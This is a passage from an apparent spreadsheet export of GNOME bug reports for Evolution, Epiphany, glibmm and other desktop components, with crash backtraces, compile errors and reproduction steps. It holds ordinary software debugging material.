menu while not connected or video display is disabled. as soon as you
reconnect though the fullscreen display is restored and you're left with a
black screen again.
editing raw gconf entries helps finally.
resolution: any of the following:
- leave /View/Fullscreen active while disconnected.
- do not store fullscreen settings to gconf.
regards
daniel</t>
  </si>
  <si>
    <t>stodden</t>
  </si>
  <si>
    <t>GTKHTML-241375</t>
  </si>
  <si>
    <t>Insert: Image spacing/padding</t>
  </si>
  <si>
    <t>Please see http://bugzilla.gnome.org/show_bug.cgi?id=241001 for a complete
list of the hig spacing/padding requirements for gnome2 apps. The gist of
this is that the Insert: Image dialog needs some additional
spacing and padding namely: 
1. The padding between the contents of the dialog and the window border
should be 12 px.
2. The spacing between the ok/cancel buttons should be 12 px. 
3. The spacing between the various widgets in the dialog should be 6px.
(Specifically be careful to make sure that you add padding between the
contents of each frame and the frame.)</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-312457</t>
  </si>
  <si>
    <t>EDS crashes always on creating recurring meeting in proxy calendar</t>
  </si>
  <si>
    <t>Did a proxy login to a account to which write only access has been given for
'Appointments'.
Created a recurring meeting with attachment. While saving EDs crashed
Backtrace was generated from '/opt/gnome/libexec/evolution-data-server-1.4'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 1085519424 (LWP 13467)]
[New Thread 1103350704 (LWP 22935)]
[Thread debugging using libthread_db enabled]
[New Thread 1085519424 (LWP 13467)]
[New Thread 1103350704 (LWP 22935)]
[Thread debugging using libthread_db enabled]
[New Thread 1085519424 (LWP 13467)]
[New Thread 1103350704 (LWP 22935)]
[New Thread 1101249456 (LWP 13483)]
[New Thread 1091922864 (LWP 13468)]
0xffffe410 in ?? ()
#0  0xffffe410 in ?? ()
#1  0x00000001 in ?? ()
#2  0x00000000 in ?? ()
#3  0xbfffe068 in ?? ()
#4  0x40aa519b in __waitpid_nocancel () from /lib/tls/libc.so.6
#5  0x40a50c68 in do_system () from /lib/tls/libc.so.6
#6  0x40a50ff0 in system () from /lib/tls/libc.so.6
#7  0x40a1566d in system () from /lib/tls/libpthread.so.0
#8  0x0804b7c0 in gnome_segv_handler (signo=11) at server.c:109
#9  
#10 0xffffe410 in ?? ()
#11 0xbfffe4e8 in ?? ()
#12 0x00035566 in ?? ()
#13 0x00000003 in ?? ()
#14 0x40acd954 in poll () from /lib/tls/libc.so.6
#15 0x4096da33 in g_main_context_acquire ()
   from /opt/gnome/lib/libglib-2.0.so.0
#16 0x4096eaf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
#17 0x407ffcf0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#18 0x0804bf20 in main (argc=1 argv=0xbfffe664) at server.c:347
Thread 4 (Thread 1091922864 (LWP 13468)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41156358 in ?? ()
No symbol table info available.
#2  0xffffffff in ?? ()
No symbol table info available.
#3  0x0000000b in ?? ()
No symbol table info available.
#4  0x40acd954 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x4096da33 in g_main_context_acquire ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x4096eaf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x408bf600 in link_set_io_thread () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#8  0x40988469 in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x40a0faa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#10 0x40ad6c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread 1101249456 (LWP 13483)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41a3b348 in ?? ()
No symbol table info available.
#2  0xffffffff in ?? ()
No symbol table info available.
#3  0x00000001 in ?? ()
No symbol table info available.
#4  0x40acd954 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x4096da33 in g_main_context_acquire ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x4096eaf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x400672eb in startup_mainloop (arg=0x0) at e-book.c:3727
	loop = (GMainLoop *) 0x8089fe0
#8  0x40988469 in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x40a0faa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#10 0x40ad6c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread 1103350704 (LWP 22935)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x41c3bd14 in ?? ()
No symbol table info available.
#2  0x00000002 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
#4  0x40a1405e in __lll_mutex_lock_wait () from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x40a10e2d in _L_mutex_lock_33 () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x41c3bd14 in ?? ()
No symbol table info available.
#7  0x0000000b in ?? ()
No symbol table info available.
#8  0x40e8616c in ?? ()
   from
/opt/gnome/lib/evolution-data-server-1.2/extensions/libecalbackendgroupwise.so
No symbol table info available.
#9  0x00000004 in ?? ()
No symbol table info available.
#10 0x41c3c330 in ?? ()
No symbol table info available.
#11 0x41c3bd34 in ?? ()
No symbol table info available.
#12 0x0804b744 in gnome_segv_handler (signo=134535292) at server.c:92
	gnome_segv_path = 0x41c3c330 
	in_segv = 1
	exec = 0x4 
#13 0x0804b744 in gnome_segv_handler (signo=11) at server.c:92
	gnome_segv_path = 0x80fadd8 \230Ã¬\020\b8Ãš\016\brsion=\1.0\
encoding=\UTF-8\?&gt;&lt;SOAP-ENV:Envelope
xmlns:xsi=\http://www.w3.org/1999/XMLSchema-instance\
xmlns:xsd=\http://www.w3.org/1999/XMLSchema\
xmlns:SOAP-ENC=\http://schemas.xmlsoap.org/s...
	in_segv = 1
	exec = 0x405c1dce \205Ã€\211Ã†\017\216Ãˆ
#14 
No symbol table info available.
#15 0x40e7dc0b in e_cal_backend_groupwise_create_object (backend=0x810d178 
    cal=0x80f6748 calobj=0x41c3c0c8 uid=0x41c3c0cc)
    at e-cal-backend-groupwise.c:1750
	list = (GList *) 0x0
	tmp = (GList *) 0x809b098
	uid_array = (GPtrArray *) 0x41610cfc
	cbgw = (ECalBackendGroupwise *) 0x810d178
	priv = (ECalBackendGroupwisePrivate *) 0x81a2f88
	icalcomp = (icalcomponent *) 0x80c6718
	comp = (ECalComponent *) 0x80b5280
	status = E_GW_CONNECTION_STATUS_OK
	server_uid = 0x0
	uid_list = (GSList *) 0x81617e0
	l = (GSList *) 0x0
	i = 1076394279
#16 0x40285618 in e_cal_backend_sync_create_object (backend=0x810d178 
    cal=0x80f6748 calobj=0x41c3c0c8 uid=0x41c3c0cc)
    at e-cal-backend-sync.c:232
	status = 135319928
#17 0x40286e76 in _e_cal_backend_create_object (backend=0x810d178 
    cal=0x80f6748 
    calobj=0x844b041
BEGIN:VEVENT\nUID:20050803T105526Z-13467-100-13251-139@linux\nDTSTAMP:20050803T105526Z\nDTSTARTTZID=/softwarestudio.org/Olson_20011030_5/Asia/Calcutta:\n
20050803T133000\nDTENDTZID=/softwarestudio.org/Ol...)
    at e-cal-backend-sync.c:683
	status = 1103348336
	uid = 0x0
	modified_calobj = 0x844b041
BEGIN:VEVENT\nUID:20050803T105526Z-13467-100-13251-139@linux\nDTSTAMP:20050803T105526Z\nDTSTARTTZID=/softwarestudio.org/Olson_20011030_5/Asia/Calcutta:\n
20050803T133000\nDTENDTZID=/softwarestudio.org/Ol...
#18 0x4027fb3d in e_cal_backend_create_object (backend=0x810d178 
    cal=0x80f6748 
    calobj=0x844b041
BEGIN:VEVENT\nUID:20050803T105526Z-13467-100-13251-139@linux\nDTSTAMP:20050803T105526Z\nDTSTARTTZID=/softwarestudio.org/Olson_20011030_5/Asia/Calcutta:\n
20050803T133000\nDTENDTZID=/softwarestudio.org/Ol...)
    at e-cal-backend.c:891
No locals.
#19 0x40288167 in impl_Cal_createObject (servant=0x80f675c 
    calobj=0x844b041
BEGIN:VEVENT\nUID:20050803T105526Z-13467-100-13251-139@linux\nDTSTAMP:20050803T105526Z\nDTSTARTTZID=/softwarestudio.org/Olson_20011030_5/Asia/Calcutta:\n
20050803T133000\nDTENDTZID=/softwarestudio.org/Ol... 
    ev=0x41c3c330) at e-data-cal.c:324
	cal = (EDataCal *) 0x80f6748
	priv = (EDataCalPrivate *) 0x836d890
#20 0x402794d8 in _ORBIT_skel_small_GNOME_Evolution_Calendar_Cal_createObject (
    _o_servant=0x80f675c _o_retval=0x0 _o_args=0x41c3c200 
    _o_ctx=0x41c3c270 _o_ev=0x41c3c330 
    _impl_createObject=0x40288117 )
    at Evolution-DataServer-Calendar-common.c:112
No locals.
#21 0x408b3d57 in IOP_profile_dump () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#22 0x408ba055 in ORBit_OAObject_invoke () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#23 0x408a6a1e in ORBit_small_invoke_adaptor ()
   from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#24 0x408b7d6a in ORBit_recv_buffer_return_sys_exception ()
   from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#25 0x408b83a4 in ORBit_recv_buffer_return_sys_exception ()
   from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#26 0x4089fcdd in giop_thread_queue_process ()
   from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#27 0x408a0668 in giop_init () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#28 0x40989db9 in g_thread_pool_push () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#29 0x40988469 in g_thread_create_full () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#30 0x40a0faa7 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#31 0x40ad6c2e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread 1085519424 (LWP 13467)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x00000001 in ?? ()
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
#3  0xbfffe068 in ?? ()
No symbol table info available.
#4  0x40aa519b in __waitpid_nocancel () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x40a50c68 in do_system () from /lib/tls/libc.so.6
No symbol table info available.
#6  0x40a50ff0 in system () from /lib/tls/libc.so.6
No symbol table info available.
#7  0x40a1566d in system () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x0804b7c0 in gnome_segv_handler (signo=11) at server.c:109
	gnome_segv_path = 0x804c79c /opt/gnome/lib/libgnomeui/gnome_segv2
	in_segv = 1
	exec = 0x42905c90 /opt/gnome/lib/libgnomeui/gnome_segv2
\/opt/gnome/libexec/evolution-data-server-1.4\ 11 \1.3.6\
#9  
No symbol table info available.
#10 0xffffe410 in ?? ()
No symbol table info available.
#11 0xbfffe4e8 in ?? ()
No symbol table info available.
#12 0x00035566 in ?? ()
No symbol table info available.
#13 0x00000003 in ?? ()
No symbol table info available.
#14 0x40acd954 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#15 0x4096da33 in g_main_context_acquire ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#16 0x4096eaf7 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#17 0x407ffcf0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#18 0x0804bf20 in main (argc=1 argv=0xbfffe664) at server.c:347
	did_books = 1
	did_cals = 1
	offline_listener = (OfflineListener *) 0x807fab0
#0  0xffffe410 in ?? ()</t>
  </si>
  <si>
    <t>EPIPHANY-151039</t>
  </si>
  <si>
    <t>save as adhears to lockdown but save doesn't</t>
  </si>
  <si>
    <t>Set the save to disk lockdown key like this:
gconftool-2 --set --type bool /desktop/gnome/lockdown/disable_save_to_disk true
While viewing this bug report use the Ctrl-S accel and the Save As dialog will
appear.  The File -&gt; Save As dialog is insensitive and the Shift-Ctrl-S is
disabled but we should really have both disabled -)</t>
  </si>
  <si>
    <t>EVOLUTION-399622</t>
  </si>
  <si>
    <t>Memory usage grow by 65MB to open 1MB plain text mail.</t>
  </si>
  <si>
    <t>Please describe the problem:
Memory usage of Evolution grow by 65MB just to open the attached 1MB mail plain text format with list of kernel files.
Steps to reproduce:
Using Slackware 11.0 + up-to-date Dropline Gnome 2.16.2:
1. Make sure sendmail is running.
2. Run the command below changing yourusername with your real username:
find /usr/src/linux/ -print | mail -s List of kernel source files yourusername@localhost
3. Run Evolution. Open one terminal window run top and look at memory usage of Evolution (131MB by the example below):
   PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                           
 3202 mateus    15   0  131m  27m  18m S  0.0  5.4   0:07.12 evolution-2.8            
4. Select File/Import follow the steps and select the file /var/spool/mail/yourusername of type MBOX. Import to the message folder of your choice.
5. Select the message you generated with the command above to open it at the preview pane.
Actual results:
Run top sort by memory usage and look for evolution process:
   PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                           
 3202 mateus    15   0  196m  90m  18m S  0.0 17.9   0:20.25 evolution-2.8                            
So 196 - 131 = 65MB of memory required to open a plain text format mail (size of 1MB).
Expected results:
Memory usage should not grow too much when the message is
opened/displayed.
Does this happen every time?
Yes but starting with different amount of memory (after grows by almost the same quantity of this example).
Other information:
Clean installation of Slackware Linux 11.0 with Linux 2.6.17.13 from /extra and
up-to-date Dropline Gnome 2.16.2. Relevant packages:
evolution-2.8.2.1-i686-1dl
evolution-data-server-1.8.2-i686-1dl
evolution-exchange-2.8.2-i686-1dl
evolution-webcal-2.8.0-i686-2dl
gtkhtml-3.12.2-i686-1dl
gal2-2.5.3-i686-3dl
libbonobo-2.16.0-i686-1dl
libbonoboui-2.16.0-i686-2dl
libgnome-2.16.0-i686-2dl
libgnomeui-2.16.1-i686-1dl
libgnomeprint-2.12.1-i686-2dl
libgnomeprintui-2.12.1-i686-2dl</t>
  </si>
  <si>
    <t>mateuscg</t>
  </si>
  <si>
    <t>EVOLUTION-231864</t>
  </si>
  <si>
    <t>Incorrect filter/vfolder-ing when matching against Mailing List</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
If I set up a filter or vFolder to match against a Mailing List if it is
anything other than 'Mailing List' 'is' it generates false positives.
Steps to reproduce the problem:
1. Set up a filter or vfolder on a mailing list
2. Change the filter or vfolder rule to say Mailing List Contains Ends
With or anything else but Is
3. Re-apply the filter
Actual Results:
False positives generated - tends to be messages that does not have any
Mailing List tag!
Expected Results:
No false positives
How often does this happen? 
Always
Additional Information:
Default Evolution as shipped with RH 8.0 Psyche</t>
  </si>
  <si>
    <t>salimma1</t>
  </si>
  <si>
    <t>BEAGLE-318690</t>
  </si>
  <si>
    <t>Old copies of web indexing logs should be deleted</t>
  </si>
  <si>
    <t>Please describe the problem:
After enabling the Beagle indexing extension in Firefox my $HOME/.beagle/Log
directory ended up with lots and lots of *IndexWebContent files. It's only been
a day since I purged those log files but already there are 361 of them in that
directory.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:
I'm running beagle-0.0.13.3-11 on SuSE 10.</t>
  </si>
  <si>
    <t>TOMBOY-449597</t>
  </si>
  <si>
    <t>Change Colours for HTML Export</t>
  </si>
  <si>
    <t>The new colours from bug #411909 should also be used for the HTML export.</t>
  </si>
  <si>
    <t>GOK-121833</t>
  </si>
  <si>
    <t>gok always segfaults on fresh install</t>
  </si>
  <si>
    <t>gok SEGVs when run on a fresh install with the default schemas.  This is
due to a null-pointer indirection in an otherwise harmless g_warning.
Probably the ideal fix would be to suppress the warning in the triggering
case since the warning is potentially misleading.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-61518</t>
  </si>
  <si>
    <t>Need a main icon without a body part</t>
  </si>
  <si>
    <t>The Main icon currently uses a body part. Body parts (hands arms feet
heads eyes) should be avoided because various cultures will find them
offensive or insensitive. In user testing the toolbox icon faired well so
perhaps either a toolbox or just a tool itself should be focused on. There
is really no need for the hand (plus the way the hand is holding the wrench
looks very agressive).</t>
  </si>
  <si>
    <t>EVOLUTION-252261</t>
  </si>
  <si>
    <t>With no Tasks folder selected new tasks created in Personal</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I have no Tasks folders highlighted and click on the New tasks button of
the toolbar. After entering a summary I click Save in the editor dialog
window. The task is created in the Personal tasks folder.
Expected Results:
The new Tasks button should be deactivated if no Tasks folder is highlighted.
Additional Information:
Machine Configuration
------------------------------------------------------------------
Red Hat Linux release 9 (Shrike) i386 2.4.20-20.8
evolution1.5-1.5.0.200312161531-0.snap.ximian.6.1
evolution-data-server-0.0.3.0.200312161531-0.snap.ximian.6.1
soup-0.7.10-4
libsoup-1.99.28.0.200310211728-0.snap.ximian.6.1
libsoup2.2-2.1.2.0.200312161531-0.snap.ximian.6.1
libgtkhtml3.1_3-3.1.4.0.200312161531-0.snap.ximian.6.1
libgal21-0.23-1
libgal2.0_3-1.99.8-0.ximian.6.3
libgal2.2_0-2.1.1.0.200312161531-0.snap.ximian.6.1
gtkhtml-1.1.8-5
gtkhtml3.0-3.0.9-0.ximian.6.1
gtkhtml3.1-3.1.4.0.200312161531-0.snap.ximian.6.1
gal-0.23-1
pilot-link-0.11.5-4
gnome-pilot-0.1.71-2
gnome-mime-data-2.2.0-1
gtk+-1.2.10-25
gtk2-2.2.1-4
bonobo-1.0.22-4
libbonoboui-2.4.1-0.ximian.6.1
libbonobo-2.4.2-0.ximian.6.2
libgnomecanvas-2.2.0.2-0.ximian.6.2
ORBit2-2.9.0-0.ximian.6.1</t>
  </si>
  <si>
    <t>GNOME-PANEL-156713</t>
  </si>
  <si>
    <t>Changing panel orientation while panel is hidden doesn't work well</t>
  </si>
  <si>
    <t>From Fedora:
  https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=136489
  1. Hide a bottom panel (using hide buttons)
  2. Change orientation to left
  Panel becomes a partially hidden left panel when it should become a fully
  hidden left panel.
Attaching screenshot from reporter.</t>
  </si>
  <si>
    <t>GLIBMM-529496</t>
  </si>
  <si>
    <t>Gio::Error::HOST_NOT_FOUND clashes with a netdb.h #define</t>
  </si>
  <si>
    <t>Smoketesting GNOME 2.23.1.
Compiling gnome-system-monitor 2.22.1 with gtkmm 2.13.0 (and glibmm 2.16.2) I get this compilation failure:
if g++ -DHAVE_CONFIG_H -I. -I. -I.. -DPROCMAN_DATADIR=\/gnome/releases/usr/share/procman/\ -DGNOMELOCALEDIR=\/gnome/releases/usr/share/locale\ -DDATADIR=\/gnome/releases/usr/share\ -DORBIT2=1 -pthread -I/gnome/releases/usr/include/glib-2.0 -I/gnome/releases/usr/lib/glib-2.0/include -I/gnome/releases/usr/include/gconf/2 -I/gnome/releases/usr/include/orbit-2.0 -I/gnome/releases/usr/include/libgtop-2.0 -I/gnome/releases/usr/include/libwnck-1.0 -I/gnome/releases/usr/include/pango-1.0 -I/gnome/releases/usr/include/cairo -I/gnome/releases/usr/include/startup-notification-1.0 -I/gnome/releases/usr/include/gtk-2.0 -I/gnome/releases/usr/include -I/gnome/releases/usr/include/pixman-1 -I/gnome/releases/usr/lib/gtk-2.0/include -I/gnome/releases/usr/include/atk-1.0 -I/gnome/releases/usr/include/gnome-vfs-2.0 -I/gnome/releases/usr/lib/gnome-vfs-2.0/include -I/gnome/releases/usr/include/gtkmm-2.4 -I/gnome/releases/usr/lib/gtkmm-2.4/include -I/gnome/releases/usr/include/glibmm-2.4 -I/gnome/releases/usr/lib/glibmm-2.4/include -I/gnome/releases/usr/include/giomm-2.4 -I/gnome/releases/usr/lib/giomm-2.4/include -I/gnome/releases/usr/include/gdkmm-2.4 -I/gnome/releases/usr/lib/gdkmm-2.4/include -I/gnome/releases/usr/include/pangomm-1.4 -I/gnome/releases/usr/include/atkmm-1.6 -I/gnome/releases/usr/include/sigc++-2.0 -I/gnome/releases/usr/lib/sigc++-2.0/include -I/gnome/releases/usr/include/cairomm-1.0 -I/gnome/releases/usr/include/libxml2 -I/gnome/releases/usr/include/librsvg-2 -I/usr/include/freetype2 -I/usr/include/libpng12      -Wall -std=c++98 -g -O2 -MT callbacks.o -MD -MP -MF .deps/callbacks.Tpo -c -o callbacks.o callbacks.cpp \
        then mv -f .deps/callbacks.Tpo .deps/callbacks.Po else rm -f .deps/callbacks.Tpo exit 1 fi
In file included from /gnome/releases/usr/include/giomm-2.4/giomm/file.h:39
                 from /gnome/releases/usr/include/giomm-2.4/giomm/mount.h:29
                 from /gnome/releases/usr/include/giomm-2.4/giomm/drive.h:28
                 from /gnome/releases/usr/include/giomm-2.4/giomm.h:30
                 from /gnome/releases/usr/include/gtkmm-2.4/gtkmm.h:30
                 from procman.h:23
                 from callbacks.h:25
                 from callbacks.cpp:27:
/gnome/releases/usr/include/giomm-2.4/giomm/error.h:72: error: expected identifier before numeric constant
/gnome/releases/usr/include/giomm-2.4/giomm/error.h:72: error: expected `}' before numeric constant
/gnome/releases/usr/include/giomm-2.4/giomm/error.h:72: error: expected unqualified-id before numeric constant
/gnome/releases/usr/include/giomm-2.4/giomm/error.h:77: error: expected `)' before â€˜error_codeâ€™
/gnome/releases/usr/include/giomm-2.4/giomm/error.h:78: error: expected `)' before â€˜*â€™ token
/gnome/releases/usr/include/giomm-2.4/giomm/error.h:79: error: â€˜Codeâ€™ does not name a type
/gnome/releases/usr/include/giomm-2.4/giomm/error.h:82: error: expected unqualified-id before â€˜privateâ€™
/gnome/releases/usr/include/giomm-2.4/giomm/error.h:85: error: â€˜friendâ€™ used outside of class
/gnome/releases/usr/include/giomm-2.4/giomm/error.h:96: error: expected declaration before â€˜}â€™ token
make: *** [callbacks.o] Erreur 1
The problem seems to be that HOST_NOT_FOUND in giomm/error.h is defined to 1 in netdb.h.</t>
  </si>
  <si>
    <t>DIA-114648</t>
  </si>
  <si>
    <t>Metapost plugin deficiencies</t>
  </si>
  <si>
    <t>Line widths and images are not correctly supported.  Arcs are drawn with
wrong (angle) endpoints.</t>
  </si>
  <si>
    <t>sperandi</t>
  </si>
  <si>
    <t>LIBEGG-453478</t>
  </si>
  <si>
    <t>Update the update-from-libegg script</t>
  </si>
  <si>
    <t>script coming up</t>
  </si>
  <si>
    <t>GAL-215146</t>
  </si>
  <si>
    <t>Deleting all global task categories causes crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.1
Synopsis: Deleting all global task categories causes crash
Bugzilla-Product: Evolution
Bugzilla-Component: Tasks
Description:
Simply removed all the Global Tasklist categories (to add my own) and
it crashed on delete of the final one.
Debugging Information:
0x40b198e9 in __wait4 () from /lib/libc.so.6
#0  0x40b198e9 in __wait4 () from /lib/libc.so.6
#1  0x40b781ec in ?? () from /lib/libc.so.6
#2  0x40788995 in waitpid (pid=9719 stat_loc=0xbfffd5d8 options=0)
    at wrapsyscall.c:134
#3  0x402e37ff in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x40787552 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 49168 
      edi = 4294967295 esi = 137366088 ebp = 3221215592 esp = 3221215572 
      ebx = 1075220644 edx = 1 ecx = 135788580 eax = 0 trapno = 14 
      err = 4 eip = 1074722043 cs = 35 __csh = 0 eflags = 2163202 
      esp_at_signal = 3221215572 ss = 43 __ssh = 0 fpstate = 0xbfffd6d8 
      oldmask = 2147483648 cr2 = 4294967292}) at signals.c:96
#5  0x40aa6c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#6  0x40486d1d in gtk_marshal_NONE__INT (object=0x82ff418 
    func=0x400ef4bc  func_data=0x8300a48 
    args=0xbfffda28) at gtkmarshal.c:240
#7  0x404b3687 in gtk_handlers_run (handlers=0x82eff10 signal=0xbfffd9e4 
    object=0x82ff418 params=0xbfffda28 after=0) at gtksignal.c:1917
#8  0x404b2b5f in gtk_signal_real_emit (object=0x82ff418 signal_id=209 
    params=0xbfffda28) at gtksignal.c:1477
#9  0x404b0df0 in gtk_signal_emit (object=0x82ff418 signal_id=209)
    at gtksignal.c:552
#10 0x400fd2e8 in eti_cursor_activated (selection=0x82fdab0 row=-1 col=-1 
    eti=0x82ff418) at e-table-item.c:2911
#11 0x40486da0 in gtk_marshal_NONE__INT_INT (object=0x82fdab0 
    func=0x400fd16c  func_data=0x82ff418 
    args=0xbfffdd94) at gtkmarshal.c:284
#12 0x404b3687 in gtk_handlers_run (handlers=0x82effd0 signal=0xbfffdd50 
    object=0x82fdab0 params=0xbfffdd94 after=0) at gtksignal.c:1917
#13 0x404b2b5f in gtk_signal_real_emit (object=0x82fdab0 signal_id=173 
    params=0xbfffdd94) at gtksignal.c:1477
#14 0x404b0df0 in gtk_signal_emit (object=0x82fdab0 signal_id=173)
    at gtksignal.c:552
#15 0x400cd5b8 in e_selection_model_key_press (selection=0x82fdab0 
    key=0xbfffe52c) at e-selection-model.c:588
#16 0x400fc599 in eti_event (item=0x82ff418 e=0xbfffe52c)
    at e-table-item.c:2550
#17 0x402a7e49 in gnome_canvas_item_marshal_signal_1 (object=0x82ff418 
    func=0x400fa81c  func_data=0x0 args=0xbfffe278)
    at gnome-canvas.c:543
#18 0x404b2b98 in gtk_signal_real_emit (object=0x82ff418 signal_id=131 
    params=0xbfffe278) at gtksignal.c:1492
#19 0x404b1103 in gtk_signal_emit_by_name (object=0x82ff418 
    name=0x4013a00f event) at gtksignal.c:618
#20 0x400bdd2b in emit_event (canvas=0x8300690 event=0xbfffe5a8)
    at e-canvas.c:276
#21 0x400bde3c in e_canvas_key (widget=0x8300690 event=0x81b798c)
    at e-canvas.c:307
#22 0x40486ad1 in gtk_marshal_BOOL__POINTER (object=0x8300690 
    func=0x400bdda8  func_data=0x0 args=0xbfffe69c)
    at gtkmarshal.c:28
#23 0x404b2b98 in gtk_signal_real_emit (object=0x8300690 signal_id=32 
    params=0xbfffe69c) at gtksignal.c:1492
#24 0x404b0df0 in gtk_signal_emit (object=0x8300690 signal_id=32)
    at gtksignal.c:552
#25 0x404e585b in gtk_widget_event (widget=0x8300690 event=0x81b798c)
    at gtkwidget.c:2864
#26 0x404ecacc in gtk_window_key_press_event (widget=0x82f9598 
    event=0x81b798c) at gtkwindow.c:1255
#27 0x402c2ae3 in gnome_dialog_key_pressed (d=0x82f9598 e=0x81b798c)
    at gnome-dialog.c:1047
#28 0x40486ad1 in gtk_marshal_BOOL__POINTER (object=0x82f9598 
    func=0x402c2a18  func_data=0x0 args=0xbfffea24)
    at gtkmarshal.c:28
#29 0x404b2b98 in gtk_signal_real_emit (object=0x82f9598 signal_id=32 
    params=0xbfffea24) at gtksignal.c:1492
#30 0x404b0df0 in gtk_signal_emit (object=0x82f9598 signal_id=32)
    at gtksignal.c:552
#31 0x404e585b in gtk_widget_event (widget=0x82f9598 event=0x81b798c)
    at gtkwidget.c:2864
#32 0x404869c6 in gtk_propagate_event (widget=0x8300690 event=0x81b798c)
    at gtkmain.c:1360
#33 0x40485cca in gtk_main_do_event (event=0x81b798c) at gtkmain.c:818
#34 0x40539392 in gdk_event_dispatch (source_data=0x0 
    current_time=0xbfffeda8 user_data=0x0) at gdkevents.c:2139
#35 0x405699f6 in g_main_dispatch (dispatch_time=0xbfffeda8) at gmain.c:656
#36 0x40569fb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#37 0x4056a129 in g_main_run (loop=0x82f8410) at gmain.c:935
#38 0x4048563a in gtk_main () at gtkmain.c:524
#39 0x402c210e in gnome_dialog_run_real (dialog=0x8275d80 close_after=0)
    at gnome-dialog.c:663
#40 0x402c21ee in gnome_dialog_run (dialog=0x8275d80) at gnome-dialog.c:715
#41 0x80b2d91 in e_categories_config_open_dialog_for_entry (entry=0x82c4be0)
    at e-categories-config.c:192
#42 0x80cb67f in categories_clicked_cb (button=0x829df80 data=0x8291610)
    at task-page.c:814
#43 0x40486def in gtk_marshal_NONE__NONE (object=0x829df80 
    func=0x80cb654  func_data=0x8291610 
    args=0xbfffef24) at gtkmarshal.c:312
#44 0x404b3687 in gtk_handlers_run (handlers=0x82bbc40 signal=0xbfffeee0 
    object=0x829df80 params=0xbfffef24 after=0) at gtksignal.c:1917
#45 0x404b2b5f in gtk_signal_real_emit (object=0x829df80 signal_id=68 
    params=0xbfffef24) at gtksignal.c:1477
#46 0x404b0df0 in gtk_signal_emit (object=0x829df80 signal_id=68)
    at gtksignal.c:552
#47 0x40428748 in gtk_button_clicked (button=0x829df80) at gtkbutton.c:336
#48 0x40429b19 in gtk_real_button_released (button=0x829df80)
    at gtkbutton.c:861
#49 0x40486def in gtk_marshal_NONE__NONE (object=0x829df80 
    func=0x40429a88  func_data=0x0 args=0xbffff264)
    at gtkmarshal.c:312
#50 0x404b2a1b in gtk_signal_real_emit (object=0x829df80 signal_id=67 
    params=0xbffff264) at gtksignal.c:1440
#51 0x404b0df0 in gtk_signal_emit (object=0x829df80 signal_id=67)
    at gtksignal.c:552
#52 0x40428698 in gtk_button_released (button=0x829df80) at gtkbutton.c:327
#53 0x40429532 in gtk_button_button_release (widget=0x829df80 event=0x81b7930)
    at gtkbutton.c:721
#54 0x40486ad1 in gtk_marshal_BOOL__POINTER (object=0x829df80 
    func=0x40429484  func_data=0x0 
    args=0xbffff5b4) at gtkmarshal.c:28
